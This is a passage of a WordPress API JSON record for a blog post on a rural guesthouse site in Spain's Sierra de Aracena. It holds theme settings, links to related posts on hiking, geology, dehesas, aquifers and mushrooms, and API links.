[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1403,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"0","ocean_second_sidebar":"0","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"0","ocean_custom_header_template":"0","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"0","ocean_menu_typo_font_family":"0","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"0","_jetpack_memberships_contains_paid_content":false,"ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"off","ocean_gallery_id":[],"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1402","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-sin-categoria","entry","has-media"],"jetpack_featured_media_url":"https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/senderos-en-la-sierra-de-aracena.jpg","jetpack-related-posts":[{"id":2601,"url":"https:\/\/casadelacorte.evolucion.center\/?p=2601","url_meta":{"origin":1402,"position":0},"title":"Descubre la Sierra de Aracena desde la Hospeder\u00eda de la Corte","author":"casadelacorte.evolucion.center","date":"26 de enero de 2025","format":false,"excerpt":"Tu casa rural en la sierra de aracena Tu casa rural en la Sierra de Aracena Ubicada en el encantador pueblo de Corteconcepci\u00f3n, en pleno coraz\u00f3n del Parque Natural de la Sierra de Aracena y Picos de Aroche, la Hospeder\u00eda de la Corte es la mejor casa rural de la\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/casadelacorte.evolucion.center\/?cat=1"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2025\/01\/dormitorio-reducida.jpg?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2025\/01\/dormitorio-reducida.jpg?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2025\/01\/dormitorio-reducida.jpg?resize=525%2C300&ssl=1 1.5x"},"classes":[]},{"id":967,"url":"https:\/\/casadelacorte.evolucion.center\/?p=967","url_meta":{"origin":1402,"position":1},"title":"\u00bfSab\u00edas que la Sierra de Aracena fue un oc\u00e9ano hace 570 millones de a\u00f1os?","author":"casadelacorte.evolucion.center","date":"19 de junio de 2020","format":false,"excerpt":"Son muchas las historias que el paso del tiempo ha ido tejiendo en este territorio. Desde el coraz\u00f3n del Parque Natural de la Sierra de Aracena, te damos la bienvenida al blog de la Casa Rural \"La Hospeder\u00eda de la Corte\": un blog que te ayudar\u00e1 a descubrir los rincones\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/casadelacorte.evolucion.center\/?cat=1"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/06\/Medusa.jpg?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/06\/Medusa.jpg?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/06\/Medusa.jpg?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/06\/Medusa.jpg?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":1343,"url":"https:\/\/casadelacorte.evolucion.center\/?p=1343","url_meta":{"origin":1402,"position":2},"title":"\u00bfSab\u00edas que las dehesas ya exist\u00edan en tiempos romanos, y que recibieron un fuerte impulso tras el descubrimiento de Am\u00e9rica?","author":"casadelacorte.evolucion.center","date":"16 de agosto de 2020","format":false,"excerpt":"La Hospeder\u00eda de la Corte se encuentra en Corteconcepci\u00f3n, un peque\u00f1o municipio situado en el coraz\u00f3n del Parque Natural de la Sierra de Aracena y Picos de Aroche. Este Parque ocupa una superficie de 186.827 hect\u00e1reas, repartidas entre 28 municipios. La dehesa: el para\u00edso de los \u201cpata negra\u201d Nada m\u00e1s\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/casadelacorte.evolucion.center\/?cat=1"},"img":{"alt_text":"Dehesa Sierra de Aracena","src":"https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/08\/Sierra-de-Aracena-La-Casa-de-la-Corte.jpg?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/08\/Sierra-de-Aracena-La-Casa-de-la-Corte.jpg?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/08\/Sierra-de-Aracena-La-Casa-de-la-Corte.jpg?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/08\/Sierra-de-Aracena-La-Casa-de-la-Corte.jpg?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":2377,"url":"https:\/\/casadelacorte.evolucion.center\/?p=2377","url_meta":{"origin":1402,"position":3},"title":"Peces, anfibios, aves y mam\u00edferos amenazados por la sobreexplotaci\u00f3n de los acu\u00edferos de la Sierra de Aracena","author":"casadelacorte.evolucion.center","date":"1 de octubre de 2023","format":false,"excerpt":"Peces, anfibios, aves y mam\u00edferos amenazados por la sobreexplotaci\u00f3n de los acu\u00edferos de la Sierra de Aracena Jos\u00e9 Carlos Cuerda Los arroyos de la Sierra de Aracena son una fuente de vida para numerosas especies de animales y plantas que habitan en este espacio natural. Estos cursos de agua, que\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/casadelacorte.evolucion.center\/?cat=1"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2023\/10\/calandino-150x150.jpeg?resize=350%2C200&ssl=1","width":350,"height":200},"classes":[]},{"id":2372,"url":"https:\/\/casadelacorte.evolucion.center\/?p=2372","url_meta":{"origin":1402,"position":4},"title":"La sobreexplotaci\u00f3n del acu\u00edfero de la Sierra de Aracena y su impacto medioambiental","author":"casadelacorte.evolucion.center","date":"19 de septiembre de 2023","format":false,"excerpt":"La sobreexplotaci\u00f3n del acu\u00edfero de la Sierra de Aracena por parte de Giahsa y su impacto medioambiental es un tema de preocupaci\u00f3n que merece atenci\u00f3n. El pantano de Aracena, ubicado a solo tres kil\u00f3metros del sistema de abastecimiento de agua a los pueblos de la sierra, se encuentra en un\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/casadelacorte.evolucion.center\/?cat=1"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2023\/09\/Cascada-Molinos-tras-la-puesta-en-marcha-del-pozo-de-Giahsa-en-julio-de-2023-1.jpg?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2023\/09\/Cascada-Molinos-tras-la-puesta-en-marcha-del-pozo-de-Giahsa-en-julio-de-2023-1.jpg?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2023\/09\/Cascada-Molinos-tras-la-puesta-en-marcha-del-pozo-de-Giahsa-en-julio-de-2023-1.jpg?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2023\/09\/Cascada-Molinos-tras-la-puesta-en-marcha-del-pozo-de-Giahsa-en-julio-de-2023-1.jpg?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2023\/09\/Cascada-Molinos-tras-la-puesta-en-marcha-del-pozo-de-Giahsa-en-julio-de-2023-1.jpg?resize=1050%2C600&ssl=1 3x"},"classes":[]},{"id":1363,"url":"https:\/\/casadelacorte.evolucion.center\/?p=1363","url_meta":{"origin":1402,"position":5},"title":"Ya est\u00e1 aqu\u00ed la temporada de setas en la Sierra de Aracena","author":"casadelacorte.evolucion.center","date":"20 de septiembre de 2020","format":false,"excerpt":"Han llegado las primeras lluvias del oto\u00f1o, y con ellas muy pronto comenzar\u00e1 la temporada de setas en la Sierra de Aracena. La riqueza gastron\u00f3mica de estos montes te sorprender\u00e1 y se hace patente en la gran variedad de setas deliciosas que probaremos este oto\u00f1o: tentullos, tanas, gallipiernos, n\u00edscalos o,\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/casadelacorte.evolucion.center\/?cat=1"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/09\/01-Tana-1.jpg?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/09\/01-Tana-1.jpg?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/09\/01-Tana-1.jpg?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/09\/01-Tana-1.jpg?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/09\/01-Tana-1.jpg?resize=1050%2C600&ssl=1 3x"},"classes":[]}],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/casadelacorte.evolucion.center\/index.php?rest_route=\/wp\/v2\/posts\/1402","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/casadelacorte.evolucion.center\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/casadelacorte.evolucion.center\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/casadelacorte.evolucion.center\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/casadelacorte.evolucion.center\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1402"}],"version-history":[{"count":6,"href":"https:\/\/casadelacorte.evolucion.center\/index.php?rest_route=\/wp\/v2\/posts\/1402\/revisions"}],"predecessor-version":[{"id":1680,"href":"https:\/\/casadelacorte.evolucion.center\/index.php?rest_route=\/wp\/v2\/posts\/1402\/revisions\/1680"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/casadelacorte.evolucion.center\/index.php?rest_route=\/wp\/v2\/media\/1403"}],"wp:attachment":[{"href":"https:\/\/casadelacorte.evolucion.center\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1402"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/casadelacorte.evolucion.center\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1402"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/casadelacorte.evolucion.center\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1402"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}